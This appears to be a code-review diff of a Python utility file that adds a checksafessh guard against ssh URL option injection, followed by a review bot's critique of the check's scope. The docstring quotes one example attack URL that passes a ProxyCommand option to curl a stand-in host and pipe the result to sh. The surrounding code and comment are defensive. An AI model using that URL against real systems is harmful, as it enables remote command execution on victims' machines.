2892 return path and path[1:2] == ':' and path[0:1].isalpha() |
2892 return path and path[1:2] == ':' and path[0:1].isalpha() |
2893 |
2893 |
2894 def urllocalpath(path): |
2894 def urllocalpath(path): |
2895 return url(path, parsequery=False, parsefragment=False).localpath() |
2895 return url(path, parsequery=False, parsefragment=False).localpath() |
2896 |
2896 |
|
2897 def checksafessh(path): |
|
2898 """check if a path / url is a potentially unsafe ssh exploit (SEC) |
|
2899 |
|
2900 This is a sanity check for ssh urls. ssh will parse the first item as |
|
2901 an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path. |
|
2902 Let's prevent these potentially exploited urls entirely and warn the |
|
2903 user. |
|
2904 |
|
2905 Raises an error.Abort when the url is unsafe. |
|
2906 """ |
|
2907 path = urlreq.unquote(path) |
|
2908 if path.startswith('ssh://-') or '|' in path: |
|
2909 raise error.Abort(_('potentially unsafe url: %r') % |
|
2910 (path,)) |
|
2911 |
2897 def hidepassword(u): |
2912 def hidepassword(u): |
2898 '''hide user credential in a url string''' |
2913 '''hide user credential in a url string''' |
2899 u = url(u) |
2914 u = url(u) |
2900 if u.passwd: |
2915 if u.passwd: |
2901 u.passwd = '***' |
2916 u.passwd = '***' |
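Review bot: In `checksafessh` (new lines 2907-2910) the `'|' in path` test runs on every input, not only on ssh URLs, so a caller that passes a local path or an http URL containing a pipe character will abort, although the docstring describes a sanity check for ssh urls. The option test is also an exact, case-sensitive prefix match on the unquoted string rather than a check on the parsed URL, so it only holds if every ssh code path sees the scheme and host exactly as this comparison does; the hunk does not show whether that is the case. Consider adding a check on the parsed components with the parser this file already uses, for example `u = url(path)` followed by `if u.scheme == 'ssh' and (u.host or '').startswith('-'):`, and keeping the raw-prefix test as a second guard. The docstring should also say which inputs the pipe rule covers, e.g. `Any path containing '|' is rejected, whatever its scheme.`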